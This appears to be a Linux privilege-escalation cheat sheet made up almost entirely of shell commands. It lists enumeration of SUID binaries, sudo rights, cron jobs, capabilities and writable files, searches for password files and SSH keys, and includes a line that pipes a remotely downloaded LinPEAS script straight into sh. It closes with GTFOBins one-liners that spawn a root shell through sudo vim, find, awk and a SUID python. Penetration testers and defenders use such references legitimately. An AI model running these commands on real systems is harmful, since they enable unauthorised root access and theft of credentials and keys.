% privesc, linux, escalation
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Check sudo permissions
sudo -l
# Find directories writable by the current user
find / -writable -type d 2>/dev/null
# Find world-writable files
find / -perm -o+w -type f 2>/dev/null
# Check cron jobs (system crontab, /etc/cron* entries, current user's crontab)
cat /etc/crontab
ls -la /etc/cron*
crontab -l
# Find files with capabilities set
getcap -r / 2>/dev/null
# Check whether the current user is in the docker group
id | grep docker
# Check kernel version (for exploits)
uname -a
# Check OS version
cat /etc/os-release
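# LinPEAS (pipes the latest release script straight into sh without review; fetch it to a file and verify it first when integrity matters)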
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum (-t enables thorough tests)
./LinEnum.sh -t
# Check whether /etc/passwd is writable (owner and mode)
ls -la /etc/passwd
# Check whether /etc/shadow is readable (owner and mode)
ls -la /etc/shadow
# Find .txt files that contain the string "password"
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
# Check NFS exports for no_root_squash
cat /etc/exports
# Find SSH keys (files named id_rsa) and authorized_keys files
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
# Check for PATH hijacking (PATH order, contents of /usr/local/bin)
echo $PATH
ls -la /usr/local/bin
# GTFOBins sudo bypass - vim
sudo vim -c ':!/bin/sh'
# GTFOBins sudo bypass - find
sudo find . -exec /bin/sh \; -quit
# GTFOBins sudo bypass - awk
sudo awk 'BEGIN {system("/bin/sh")}'
# GTFOBins SUID - python
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'